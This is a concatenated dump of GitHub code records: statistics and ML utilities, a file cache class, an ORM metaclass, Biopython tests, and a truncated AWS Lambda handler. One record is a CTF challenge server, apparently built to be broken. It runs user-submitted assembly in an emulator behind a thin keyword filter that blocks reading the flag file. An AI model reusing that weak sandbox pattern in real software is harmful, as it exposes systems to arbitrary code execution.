oof[['customer_ID','target','prediction']].to_csv(oof_path, index=False)\n sub[['customer_ID','prediction']].to_csv(sub_path, index=False)\n\n # Full score and LINE Notify\n full_score = round(amex_metric_mod(oof['target'], oof['prediction']),6)\n\n # LINE notify\n line_notify(f'{sys.argv[0]} done. Full kaggle metric: {full_score}')\n\nif __name__ == '__main__':\n main()","repo_name":"MitsuruFujiwara/Amex-Default-Prediction","sub_path":"src/201_ensemble_seed_avg.py","file_name":"201_ensemble_seed_avg.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33403020599","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Dependency imports\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_probability.python.internal import distribution_util as util\nfrom tensorflow.python.ops import control_flow_ops\n\n__all__ = [\n 'percentile',\n 'quantiles',\n]\n\n\ndef percentile(x,\n q,\n axis=None,\n interpolation=None,\n keep_dims=False,\n validate_args=False,\n preserve_gradients=True,\n name=None):\n \"\"\"Compute the `q`-th percentile(s) of `x`.\n\n Given a vector `x`, the `q`-th percentile of `x` is the value `q / 100` of the\n way from the minimum to the maximum in a sorted copy of `x`.\n\n The values and distances of the two nearest neighbors as well as the\n `interpolation` parameter will determine the percentile if the normalized\n ranking does not match the location of `q` exactly.\n\n This function is the same as the median if `q = 50`, the same as the minimum\n if `q = 0` and the same as the maximum if `q = 100`.\n\n Multiple percentiles can be computed at once by using `1-D` vector `q`.\n Dimension zero of the returned `Tensor` will index the different percentiles.\n\n\n ```python\n # Get 30th percentile with default ('nearest') interpolation.\n x = [1., 2., 3., 4.]\n tfp.stats.percentile(x, q=30.)\n ==> 2.0\n\n # Get 30th percentile with 'linear' interpolation.\n x = [1., 2., 3., 4.]\n tfp.stats.percentile(x, q=30., interpolation='linear')\n ==> 1.9\n\n # Get 30th and 70th percentiles with 'lower' interpolation\n x = [1., 2., 3., 4.]\n tfp.stats.percentile(x, q=[30., 70.], interpolation='lower')\n ==> [1., 3.]\n\n # Get 100th percentile (maximum). By default, this is computed over every dim\n x = [[1., 2.]\n [3., 4.]]\n tfp.stats.percentile(x, q=100.)\n ==> 4.\n\n # Treat the leading dim as indexing samples, and find the 100th quantile (max)\n # over all such samples.\n x = [[1., 2.]\n [3., 4.]]\n tfp.stats.percentile(x, q=100., axis=[0])\n ==> [3., 4.]\n ```\n\n Compare to `numpy.percentile`.\n\n Args:\n x: Floating point `N-D` `Tensor` with `N > 0`. If `axis` is not `None`,\n `x` must have statically known number of dimensions.\n q: Scalar or vector `Tensor` with values in `[0, 100]`. The percentile(s).\n axis: Optional `0-D` or `1-D` integer `Tensor` with constant values. The\n axis that hold independent samples over which to return the desired\n percentile. If `None` (the default), treat every dimension as a sample\n dimension, returning a scalar.\n interpolation : {'nearest', 'linear', 'lower', 'higher', 'midpoint'}.\n Default value: 'nearest'. 
This specifies the interpolation method to\n use when the desired quantile lies between two data points `i < j`:\n * linear: i + (j - i) * fraction, where fraction is the fractional part\n of the index surrounded by i and j.\n * lower: `i`.\n * higher: `j`.\n * nearest: `i` or `j`, whichever is nearest.\n * midpoint: (i + j) / 2.\n `linear` and `midpoint` interpolation do not work with integer dtypes.\n keep_dims: Python `bool`. If `True`, the last dimension is kept with size 1\n If `False`, the last dimension is removed from the output shape.\n validate_args: Whether to add runtime checks of argument validity. If\n False, and arguments are incorrect, correct behavior is not guaranteed.\n preserve_gradients: Python `bool`. If `True`, ensure that gradient w.r.t\n the percentile `q` is preserved in the case of linear interpolation.\n If `False`, the gradient will be (incorrectly) zero when `q` corresponds\n to a point in `x`.\n name: A Python string name to give this `Op`. Default is 'percentile'\n\n Returns:\n A `(rank(q) + N - len(axis))` dimensional `Tensor` of same dtype as `x`, or,\n if `axis` is `None`, a `rank(q)` `Tensor`. The first `rank(q)` dimensions\n index quantiles for different values of `q`.\n\n Raises:\n ValueError: If argument 'interpolation' is not an allowed type.\n ValueError: If interpolation type not compatible with `dtype`.\n \"\"\"\n name = name or 'percentile'\n allowed_interpolations = {'linear', 'lower', 'higher', 'nearest', 'midpoint'}\n\n if interpolation is None:\n interpolation = 'nearest'\n else:\n if interpolation not in allowed_interpolations:\n raise ValueError('Argument `interpolation` must be in %s. Found %s' %\n (allowed_interpolations, interpolation))\n\n with tf.name_scope(name, values=[x, q]):\n x = tf.convert_to_tensor(x, name='x')\n\n if interpolation in {'linear', 'midpoint'} and x.dtype.is_integer:\n raise TypeError('{} interpolation not allowed with dtype {}'.format(\n interpolation, x.dtype))\n\n # Double is needed here and below, else we get the wrong index if the array\n # is huge along axis.\n q = tf.cast(q, tf.float64)\n _get_static_ndims(q, expect_ndims_no_more_than=1)\n\n if validate_args:\n q = control_flow_ops.with_dependencies([\n tf.assert_rank_in(q, [0, 1]),\n tf.assert_greater_equal(q, tf.cast(0., tf.float64)),\n tf.assert_less_equal(q, tf.cast(100., tf.float64))\n ], q)\n\n if axis is None:\n y = tf.reshape(x, [-1])\n else:\n axis = tf.convert_to_tensor(axis, name='axis', dtype=tf.int32)\n tf.assert_integer(axis)\n axis_ndims = _get_static_ndims(\n axis, expect_static=True, expect_ndims_no_more_than=1)\n axis_const = tf.contrib.util.constant_value(axis)\n if axis_const is None:\n raise ValueError(\n 'Expected argument `axis` to be statically available. Found: %s' %\n axis)\n axis = axis_const\n if axis_ndims == 0:\n axis = [axis]\n axis = [int(a) for a in axis]\n x_ndims = _get_static_ndims(\n x, expect_static=True, expect_ndims_at_least=1)\n axis = _make_static_axis_non_negative(axis, x_ndims)\n # Move dims in axis to the end, since _sort_tensor, which calls top_k,\n # only sorts the last dim.\n y = _move_dims_to_flat_end(x, axis, x_ndims)\n\n frac_at_q_or_above = 1. - q / 100.\n\n # Sort everything, not just the top 'k' entries, which allows multiple calls\n # to sort only once (under the hood) and use CSE.\n sorted_y = _sort_tensor(y)\n\n d = tf.cast(tf.shape(y)[-1], tf.float64)\n\n def _get_indices(interp_type):\n \"\"\"Get values of y at the indices implied by interp_type.\"\"\"\n # Note `lower` <--> ceiling. Confusing, huh? 
Due to the fact that\n # _sort_tensor sorts highest to lowest, tf.ceil corresponds to the higher\n # index, but the lower value of y!\n if interp_type == 'lower':\n indices = tf.ceil((d - 1) * frac_at_q_or_above)\n elif interp_type == 'higher':\n indices = tf.floor((d - 1) * frac_at_q_or_above)\n elif interp_type == 'nearest':\n indices = tf.round((d - 1) * frac_at_q_or_above)\n # d - 1 will be distinct from d in int32, but not necessarily double.\n # So clip to avoid out of bounds errors.\n return tf.clip_by_value(\n tf.cast(indices, tf.int32), 0, tf.shape(y)[-1] - 1)\n\n if interpolation in ['nearest', 'lower', 'higher']:\n gathered_y = tf.gather(sorted_y, _get_indices(interpolation), axis=-1)\n elif interpolation == 'midpoint':\n gathered_y = 0.5 * (\n tf.gather(sorted_y, _get_indices('lower'), axis=-1) +\n tf.gather(sorted_y, _get_indices('higher'), axis=-1))\n elif interpolation == 'linear':\n # Copy-paste of docstring on interpolation:\n # linear: i + (j - i) * fraction, where fraction is the fractional part\n # of the index surrounded by i and j.\n larger_y_idx = _get_indices('lower')\n exact_idx = (d - 1) * frac_at_q_or_above\n if preserve_gradients:\n # If q cooresponds to a point in x, we will initially have\n # larger_y_idx == smaller_y_idx.\n # This results in the gradient w.r.t. fraction being zero (recall `q`\n # enters only through `fraction`...and see that things cancel).\n # The fix is to ensure that smaller_y_idx and larger_y_idx are always\n # separated by exactly 1.\n smaller_y_idx = tf.maximum(larger_y_idx - 1, 0)\n larger_y_idx = tf.minimum(smaller_y_idx + 1, tf.shape(y)[-1] - 1)\n fraction = tf.cast(larger_y_idx, tf.float64) - exact_idx\n else:\n smaller_y_idx = _get_indices('higher')\n fraction = tf.ceil((d - 1) * frac_at_q_or_above) - exact_idx\n\n fraction = tf.cast(fraction, y.dtype)\n gathered_y = (\n tf.gather(sorted_y, larger_y_idx, axis=-1) * (1 - fraction) +\n tf.gather(sorted_y, smaller_y_idx, axis=-1) * fraction)\n\n if keep_dims:\n if axis is None:\n ones_vec = tf.ones(\n shape=[_get_best_effort_ndims(x) + _get_best_effort_ndims(q)],\n dtype=tf.int32)\n gathered_y *= tf.ones(ones_vec, dtype=x.dtype)\n else:\n gathered_y = _insert_back_keep_dims(gathered_y, axis)\n\n # If q is a scalar, then result has the right shape.\n # If q is a vector, then result has trailing dim of shape q.shape, which\n # needs to be rotated to dim 0.\n return util.rotate_transpose(gathered_y, tf.rank(q))\n\n\ndef quantiles(x,\n num_quantiles,\n axis=None,\n interpolation=None,\n keep_dims=False,\n validate_args=False,\n name=None):\n \"\"\"Compute quantiles of `x` along `axis`.\n\n The quantiles of a distribution are cut points dividing the range into\n intervals with equal probabilities.\n\n Given a vector `x` of samples, this function estimates the cut points by\n returning `num_quantiles + 1` cut points, `(c0, ..., cn)`, such that, roughly\n speaking, equal number of sample points lie in the `num_quantiles` intervals\n `[c0, c1), [c1, c2), ..., [c_{n-1}, cn]`. That is,\n\n * About `1 / n` fraction of the data lies in `[c_{k-1}, c_k)`, `k = 1, ..., n`\n * About `k / n` fraction of the data lies below `c_k`.\n * `c0` is the sample minimum and `cn` is the maximum.\n\n The exact number of data points in each interval depends on the size of\n `x` (e.g. 
whether the size is divisible by `n`) and the `interpolation` kwarg.\n\n\n ```python\n # Get quartiles of x with various interpolation choices.\n x = [0., 1., 2., 3., 4., 5., 6., 7., 8., 9., 10.]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='nearest')\n ==> [ 0., 2., 5., 8., 10.]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='linear')\n ==> [ 0. , 2.5, 5. , 7.5, 10. ]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='lower')\n ==> [ 0., 2., 5., 7., 10.]\n\n # Get deciles of columns of an R x C data set.\n data = load_my_columnar_data(...)\n tfp.stats.quantiles(data, num_quantiles=10)\n ==> Shape [11, C] Tensor\n ```\n\n Args:\n x: Floating point `N-D` `Tensor` with `N > 0`. If `axis` is not `None`,\n `x` must have statically known number of dimensions.\n num_quantiles: Scalar `integer` `Tensor`. The number of intervals the\n returned `num_quantiles + 1` cut points divide the range into.\n axis: Optional `0-D` or `1-D` integer `Tensor` with constant values. The\n axis that hold independent samples over which to return the desired\n percentile. If `None` (the default), treat every dimension as a sample\n dimension, returning a scalar.\n interpolation : {'nearest', 'linear', 'lower', 'higher', 'midpoint'}.\n Default value: 'nearest'. This specifies the interpolation method to\n use when the fractions `k / n` lie between two data points `i < j`:\n * linear: i + (j - i) * fraction, where fraction is the fractional part\n of the index surrounded by i and j.\n * lower: `i`.\n * higher: `j`.\n * nearest: `i` or `j`, whichever is nearest.\n * midpoint: (i + j) / 2. `linear` and `midpoint` interpolation do not\n work with integer dtypes.\n keep_dims: Python `bool`. If `True`, the last dimension is kept with size 1\n If `False`, the last dimension is removed from the output shape.\n validate_args: Whether to add runtime checks of argument validity. If\n False, and arguments are incorrect, correct behavior is not guaranteed.\n name: A Python string name to give this `Op`. Default is 'percentile'\n\n Returns:\n cut_points: A `rank(x) + 1 - len(axis)` dimensional `Tensor` with same\n `dtype` as `x` and shape `[num_quantiles + 1, ...]` where the trailing shape\n is that of `x` without the dimensions in `axis` (unless `keep_dims is True`)\n\n Raises:\n ValueError: If argument 'interpolation' is not an allowed type.\n ValueError: If interpolation type not compatible with `dtype`.\n \"\"\"\n with tf.name_scope(name, 'quantiles', values=[x, num_quantiles, axis]):\n x = tf.convert_to_tensor(x, name='x')\n return percentile(\n x,\n q=tf.linspace(\n tf.convert_to_tensor(0, dtype=x.dtype),\n tf.convert_to_tensor(100, dtype=x.dtype),\n num=num_quantiles + 1),\n axis=axis,\n interpolation=interpolation,\n keep_dims=keep_dims,\n validate_args=validate_args,\n preserve_gradients=False)\n\n\ndef _get_static_ndims(x,\n expect_static=False,\n expect_ndims=None,\n expect_ndims_no_more_than=None,\n expect_ndims_at_least=None):\n \"\"\"Get static number of dimensions and assert that some expectations are met.\n\n This function returns the number of dimensions 'ndims' of x, as a Python int.\n\n The optional expect arguments are used to check the ndims of x, but this is\n only done if the static ndims of x is not None.\n\n Args:\n x: A Tensor.\n expect_static: Expect `x` to have statically defined `ndims`.\n expect_ndims: Optional Python integer. If provided, assert that x has\n number of dimensions equal to this.\n expect_ndims_no_more_than: Optional Python integer. 
If provided, assert\n      that x has no more than this many dimensions.\n    expect_ndims_at_least: Optional Python integer. If provided, assert that x\n      has at least this many dimensions.\n\n  Returns:\n    ndims: A Python integer.\n\n  Raises:\n    ValueError: If any of the expectations above are violated.\n  \"\"\"\n  ndims = x.shape.ndims\n  if ndims is None:\n    shape_const = tf.contrib.util.constant_value(tf.shape(x))\n    if shape_const is not None:\n      ndims = shape_const.ndim\n\n  if ndims is None:\n    if expect_static:\n      raise ValueError(\n          'Expected argument `x` to have statically defined `ndims`. Found: %s' %\n          x)\n    return\n\n  if expect_ndims is not None:\n    ndims_message = ('Expected argument `x` to have ndims %s. Found tensor %s'\n                     % (expect_ndims, x))\n    if ndims != expect_ndims:\n      raise ValueError(ndims_message)\n\n  if expect_ndims_at_least is not None:\n    ndims_at_least_message = (\n        'Expected argument `x` to have ndims >= %d. Found tensor %s' %\n        (expect_ndims_at_least, x))\n    if ndims < expect_ndims_at_least:\n      raise ValueError(ndims_at_least_message)\n\n  if expect_ndims_no_more_than is not None:\n    ndims_no_more_than_message = (\n        'Expected argument `x` to have ndims <= %d. Found tensor %s' %\n        (expect_ndims_no_more_than, x))\n    if ndims > expect_ndims_no_more_than:\n      raise ValueError(ndims_no_more_than_message)\n\n  return ndims\n\n\ndef _get_best_effort_ndims(x,\n                           expect_ndims=None,\n                           expect_ndims_at_least=None,\n                           expect_ndims_no_more_than=None):\n  \"\"\"Get static ndims if possible. Fallback on `tf.rank(x)`.\"\"\"\n  ndims_static = _get_static_ndims(\n      x,\n      expect_ndims=expect_ndims,\n      expect_ndims_at_least=expect_ndims_at_least,\n      expect_ndims_no_more_than=expect_ndims_no_more_than)\n  if ndims_static is not None:\n    return ndims_static\n  return tf.rank(x)\n\n\ndef _insert_back_keep_dims(x, axis):\n  \"\"\"Insert the dims in `axis` back as singletons after being removed.\n\n  Args:\n    x: `Tensor`.\n    axis: Python list of integers.\n\n  Returns:\n    `Tensor` with same values as `x`, but additional singleton dimensions.\n  \"\"\"\n  for i in sorted(axis):\n    x = tf.expand_dims(x, axis=i)\n  return x\n\n\ndef _make_static_axis_non_negative(axis, ndims):\n  \"\"\"Convert possibly negatively indexed axis to non-negative.\n\n  Args:\n    axis: Iterable over Python integers.\n    ndims: Number of dimensions into which axis indexes.\n\n  Returns:\n    A list of non-negative Python integers.\n\n  Raises:\n    ValueError: If values in `axis` are too big/small to index into `ndims`.\n  \"\"\"\n  non_negative_axis = []\n  for d in axis:\n    if d >= 0:\n      if d >= ndims:\n        raise ValueError('dim %d not in the interval [0, %d].' 
% (d, ndims - 1))\n non_negative_axis.append(d)\n else:\n if d < -1 * ndims:\n raise ValueError(\n 'Negatively indexed dim %d not in the interval [-%d, -1]' % (d,\n ndims))\n non_negative_axis.append(ndims + d)\n return non_negative_axis\n\n\ndef _move_dims_to_flat_end(x, axis, x_ndims):\n \"\"\"Move dims corresponding to `axis` in `x` to the end, then flatten.\n\n Args:\n x: `Tensor` with shape `[B0,B1,...,Bb]`.\n axis: Python list of indices into dimensions of `x`.\n x_ndims: Python integer holding number of dimensions in `x`.\n\n Returns:\n `Tensor` with value from `x` and dims in `axis` moved to end into one single\n dimension.\n \"\"\"\n # Suppose x.shape = [a, b, c, d]\n # Suppose axis = [1, 3]\n\n # front_dims = [0, 2] in example above.\n front_dims = sorted(set(range(x_ndims)).difference(axis))\n # x_permed.shape = [a, c, b, d]\n x_permed = tf.transpose(x, perm=front_dims + list(axis))\n\n if x.shape.is_fully_defined():\n x_shape = x.shape.as_list()\n # front_shape = [a, c], end_shape = [b * d]\n front_shape = [x_shape[i] for i in front_dims]\n end_shape = [np.prod([x_shape[i] for i in axis])]\n full_shape = front_shape + end_shape\n else:\n front_shape = tf.shape(x_permed)[:x_ndims - len(axis)]\n end_shape = [-1]\n full_shape = tf.concat([front_shape, end_shape], axis=0)\n return tf.reshape(x_permed, shape=full_shape)\n\n\ndef _sort_tensor(tensor):\n \"\"\"Use `top_k` to sort a `Tensor` along the last dimension.\"\"\"\n sorted_, _ = tf.nn.top_k(tensor, k=tf.shape(tensor)[-1])\n sorted_.set_shape(tensor.shape)\n return sorted_\n","repo_name":"xlandscape/CmfContinuous-Component","sub_path":"module/bin/python/Lib/site-packages/tensorflow_probability/python/stats/quantiles.py","file_name":"quantiles.py","file_ext":"py","file_size_in_byte":18542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"12734593893","text":"import os.path\nimport shutil\n\nfrom .FilesetInfoAccumulator import FilesetInfoAccumulator\nfrom .FilespecMerger import FilespecMerger\nfrom .PooledFile import listdir\nfrom .util import debug_log, verbose_stderr, warning\n\nclass FilesetCache(object):\n \"\"\"FilesetCache is a base class.\"\"\"\n\n def __init__(self, parent, path, deltadir, ctx, attrs, sel, next):\n self._parent = parent\n self._path = path\n self._deltadir = deltadir\n self._ctx = ctx\n self._attrs = attrs\n self._sel = sel\n self._next = next\n self._fileinfo = None\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n\n def __hash__(self):\n \"\"\"For storage in sets.\"\"\"\n return id(self)\n\n def __eq__(self, other):\n \"\"\"For storage in sets.\"\"\"\n return self is other\n\n def _subpath(self, x):\n return os.path.join(self._path, '_' + str(x))\n\n def _subdeltadir(self, x):\n return os.path.join(self._deltadir, '_' + str(x))\n\n def children(self):\n \"\"\"Child filesets are stored with a leading underscore, to leave room for metadata.\"\"\"\n for x in listdir(self._path):\n if x.startswith('_'):\n yield x[1:]\n\n def infopath(self, deleted=False):\n if deleted:\n return os.path.join(self._deltadir, \"deleted.info\")\n else:\n return os.path.join(self._path, \"info\")\n\n def purge(self):\n \"\"\"Purge existing cache on disk, and create empty.\"\"\"\n #debug_log(\"FilesetCache purging %s\\n\" % self._path)\n if os.path.exists(self._path):\n # Purge existing cache.\n # For safety in case of misconfiguration, we only delete directories with a leading underscore\n for x in listdir(self._path):\n px = os.path.join(self._path, x)\n if 
x.startswith('_'):\n shutil.rmtree(px)\n elif x == 'info':\n os.remove(px)\n else:\n verbose_stderr(\"WARNING: cache purge ignoring %s\\n\" % px)\n else:\n os.makedirs(self._path)\n\n def select(self, filter=None):\n merger = FilespecMerger()\n for f, f1 in self.filtered(filter):\n merger.add(f.select(f1))\n # no yield from in python 2, so:\n for filespec in merger.merge():\n yield filespec\n\n def merge_info(self, acc, filter=None):\n \"\"\"Return whether merged from cache; otherwise caller will have to scan over filespecs.\"\"\"\n #debug_log(\"FilesetCache(%s) merge_info\\n\" % self._path)\n if filter is None:\n #debug_log(\"FilesetCache(%s)::merge_info(None)\\n\" % self._path)\n if self._fileinfo is None:\n #debug_log(\"FilesetCache(%s)::merge_info(None) reading info file\\n\" % self._path)\n infofile = self.infopath()\n deletedInfofile = self.infopath(deleted=True)\n try:\n if os.path.exists(deletedInfofile):\n # if deleted filelist is older than cache, remove it\n if os.stat(deletedInfofile).st_mtime < os.stat(infofile).st_mtime:\n #debug_log(\"removing obsolete deleted infofile %s\\n\" % deletedInfofile)\n os.remove(deletedInfofile)\n else:\n #debug_log(\"reading deleted infofile %s\\n\" % deletedInfofile)\n with open(deletedInfofile, 'r') as f:\n self._deletedInfo = FilesetInfoAccumulator.fromFile(f, self._attrs)\n except IOError:\n warning(\"can't read deleted info %s, ignoring\" % deletedInfofile)\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n try:\n with open(infofile, 'r') as f:\n self._fileinfo = FilesetInfoAccumulator.fromFile(f, self._attrs)\n except IOError:\n warning(\"can't read info %s, ignoring\" % infofile)\n\n if self._fileinfo is not None:\n acc.accumulate(self._fileinfo)\n acc.decumulate(self._deletedInfo)\n #debug_log(\"FilesetCache(%s)::merge_info() done\\n\" % self._path)\n return True\n #debug_log(\"FilesetCache(%s)::merge_info() not merged yet\\n\" % self._path)\n\n #debug_log(\"FilesetCache(%s)::merge_info() still here\\n\" % self._path)\n # didn't manage to read infofile, or we need a filtered scan\n if self._next is not None:\n #debug_log(\"FilesetCache(%s)::merge_info() asking children\\n\" % self._path)\n for f, f1 in self.filtered(filter):\n f.merge_info(acc, f1)\n return True\n else:\n #debug_log(\"FilesetCache(%s)::merge_info() baling\\n\" % self._path)\n return False\n\n def add(self, filespec):\n if self._next is not None:\n self.filesetFor(filespec).add(filespec)\n if self._fileinfo is None:\n self._fileinfo = FilesetInfoAccumulator(self._attrs)\n self._fileinfo.add(filespec)\n\n def finalize(self):\n #debug_log(\"FilesetCache::finalize(%s)\\n\" % self._path)\n finalized = False\n if self._next is not None:\n for f, f1 in self.filtered(None):\n f.finalize()\n if not finalized:\n finalized = True\n\n # write info file, only if a child did something\n if self._next is None or finalized:\n with open(self.infopath(), 'w') as infofile:\n if self._fileinfo is not None:\n self._fileinfo.write(infofile)\n\n def delete(self, filespec):\n #debug_log(\"FilesetCache(%s)::delete %s\\n\" % (self._path, filespec.path))\n self._deletedInfo.add(filespec)\n self._ctx.pendingCaches.add(self)\n if self._parent is not None:\n self._parent.delete(filespec)\n\n def saveDeletions(self):\n #debug_log(\"FilesetCache(%s)::saveDeletions\\n\" % self._path)\n try:\n if not os.path.exists(self._deltadir):\n os.makedirs(self._deltadir)\n except IOError:\n warning(\"can't create deltadir %s, ignoring\" % self._deltadir)\n return\n if self._deletedInfo.nFiles > 0:\n 
deletedInfofile = self.infopath(deleted=True)\n #debug_log(\"FilesetCache(%s)::saveDeletions deletedInfo\\n\" % self._path)\n try:\n with open(deletedInfofile, 'w') as f:\n self._deletedInfo.write(f)\n except IOError:\n warning(\"can't write deleted info %s, ignoring\" % deletedInfofile)\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n","repo_name":"tesujimath/filebutler","sub_path":"filebutler/FilesetCache.py","file_name":"FilesetCache.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38269483342","text":"import os\nimport random\nimport string\nimport subprocess\n\ndef randstr(l):\n return ''.join([random.choice(string.ascii_letters) for i in range(l)])\n\ndef check(code):\n if len(code) > 0x1000:\n print(\"[-] Too large\")\n return False\n if 'incbin' in code:\n print(\"[-] You can't guess the filename of the flag\")\n return False\n if '%' in code:\n print(\"[-] Macro is disabled just in case\")\n return False\n return True\n\nif __name__ == '__main__':\n print(\"* Paste your assembly code to emulate ('EOF' to end)\")\n\n # read code\n code = 'BITS 64\\n'\n code += 'ORG 0\\n'\n while True:\n line = input()\n if line == 'EOF':\n break\n code += line + '\\n'\n\n # check code\n if not check(code):\n exit(1)\n\n # save to file\n name = \"/tmp/\" + randstr(32)\n with open(f\"{name}.S\", \"w\") as f:\n f.write(code)\n\n # assemble\n p = subprocess.Popen([\"/usr/bin/nasm\",\n \"-fbin\", f\"{name}.S\",\n \"-o\", f\"{name}.bin\"])\n if p.wait(timeout=1) != 0:\n print(\"[-] Assemble failed\")\n exit(1)\n\n os.remove(f\"{name}.S\")\n\n # emulate\n try:\n pid = os.fork()\n if pid == 0:\n os.execl(\"./x64-emulator\", \"./x64-emulator\", f\"{name}.bin\")\n os._exit(0)\n else:\n os.waitpid(pid, 0)\n except Exception as e:\n print(e)\n finally:\n os.remove(f\"{name}.bin\")\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/zer0pts/2021/pwn/nasm_kit/bin/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"5415052671","text":"from ikea.fields import BaseColumn\nfrom collections import OrderedDict\n\n\nclass Metabase(type):\n\n def __new__(cls, name, bases, clsdict):\n fields = OrderedDict()\n clsobj = super().__new__(cls, name, bases, clsdict)\n\n if not hasattr(clsobj, '__tablename__'):\n raise AttributeError(\"Models must have a __tablename__!\")\n\n if not hasattr(clsobj, '_registry'):\n clsobj._registry = set()\n else:\n clsobj._registry.add(clsobj)\n\n for attr, value in clsdict.items():\n if isinstance(value, BaseColumn):\n fields[attr] = value\n\n for attr, _ in fields.items():\n clsdict.pop(attr)\n\n setattr(clsobj, 'fields', fields)\n\n return clsobj\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nimor111/101-v5","sub_path":"week13/HomemadeORM/ikea/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71740815290","text":"import random\nrandlist = \"1234567890qwertyuiopasdfghjklzxcvbnm-*/+.,?[]}{_\\=''\"\ndef my_fun(n):\n my_list = []\n for i in range (1, n):\n x = random.choice(randlist)\n my_list.append (x)\n print (my_list)\nn = int 
(input())\nmy_fun(n)","repo_name":"Malika939/Funkzii2","sub_path":"Problem11.py","file_name":"Problem11.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31863391028","text":"import copy\nimport unittest\nimport warnings\n\ntry:\n import numpy\n from numpy import linalg # missing in PyPy's micronumpy\nexcept ImportError:\n from Bio import MissingExternalDependencyError\n\n raise MissingExternalDependencyError(\n \"Install NumPy if you want to use Bio.LogisticRegression.\"\n ) from None\n\nfrom Bio import BiopythonDeprecationWarning\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=BiopythonDeprecationWarning)\n from Bio import LogisticRegression\n\n\nxs = [\n [-53, -200.78],\n [117, -267.14],\n [57, -163.47],\n [16, -190.30],\n [11, -220.94],\n [85, -193.94],\n [16, -182.71],\n [15, -180.41],\n [-26, -181.73],\n [58, -259.87],\n [126, -414.53],\n [191, -249.57],\n [113, -265.28],\n [145, -312.99],\n [154, -213.83],\n [147, -380.85],\n [93, -291.13],\n]\n\nys = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]\n\n\ndef show_progress(iteration, loglikelihood):\n \"\"\"No action callback function, used when training the model.\"\"\"\n pass\n\n\nclass TestLogisticRegression(unittest.TestCase):\n def test_xs_and_ys_input_parameter_lengths(self):\n modified_xs = copy.copy(xs)\n modified_xs.pop()\n self.assertRaises(ValueError, LogisticRegression.train, modified_xs, ys)\n\n def test_ys_input_class_assignments(self):\n modified_ys = copy.copy(ys)\n modified_ys.pop()\n modified_ys.append(2)\n self.assertRaises(ValueError, LogisticRegression.train, xs, modified_ys)\n\n def test_dimensionality_of_input_xs(self):\n modified_xs = copy.copy(xs)\n modified_xs[0] = []\n self.assertRaises(ValueError, LogisticRegression.train, modified_xs, ys)\n\n def test_calculate_model(self):\n model = LogisticRegression.train(xs, ys)\n beta = model.beta\n self.assertAlmostEqual(beta[0], 8.9830, places=4)\n self.assertAlmostEqual(beta[1], -0.0360, places=4)\n self.assertAlmostEqual(beta[2], 0.0218, places=4)\n\n def test_calculate_model_with_update_callback(self):\n model = LogisticRegression.train(xs, ys, update_fn=show_progress)\n beta = model.beta\n self.assertAlmostEqual(beta[0], 8.9830, places=4)\n\n def test_classify(self):\n model = LogisticRegression.train(xs, ys)\n result = LogisticRegression.classify(model, [6, -173.143442352])\n self.assertEqual(result, 1)\n result = LogisticRegression.classify(model, [309, -271.005880394])\n self.assertEqual(result, 0)\n\n def test_calculate_probability(self):\n model = LogisticRegression.train(xs, ys)\n q, p = LogisticRegression.calculate(model, [6, -173.143442352])\n self.assertAlmostEqual(p, 0.993242, places=6)\n self.assertAlmostEqual(q, 0.006758, places=6)\n q, p = LogisticRegression.calculate(model, [309, -271.005880394])\n self.assertAlmostEqual(p, 0.000321, places=6)\n self.assertAlmostEqual(q, 0.999679, places=6)\n\n def test_model_accuracy(self):\n correct = 0\n model = LogisticRegression.train(xs, ys)\n predictions = [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]\n for i in range(len(predictions)):\n prediction = LogisticRegression.classify(model, xs[i])\n self.assertEqual(prediction, predictions[i])\n if prediction == ys[i]:\n correct += 1\n self.assertEqual(correct, 16)\n\n def test_leave_one_out(self):\n correct = 0\n predictions = [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0]\n for i in range(len(predictions)):\n 
model = LogisticRegression.train(xs[:i] + xs[i + 1 :], ys[:i] + ys[i + 1 :])\n prediction = LogisticRegression.classify(model, xs[i])\n self.assertEqual(prediction, predictions[i])\n if prediction == ys[i]:\n correct += 1\n self.assertEqual(correct, 15)\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity=2)\n unittest.main(testRunner=runner)\n","repo_name":"biopython/biopython","sub_path":"Tests/test_LogisticRegression.py","file_name":"test_LogisticRegression.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"71627019770","text":"import json\nimport boto3\nimport datetime\nfrom requests_aws4auth import AWS4Auth\nimport requests\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom pprint import pprint\n\n\ndef lambda_handler(event, context):\n ingredients = event[\"ingredients\"]\n search_time = event[\"search_time\"]\n picture_url = event[\"picture_url\"]\n user_id = event[\"user_id\"]\n\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1',\n aws_secret_access_key=\"*\",\n 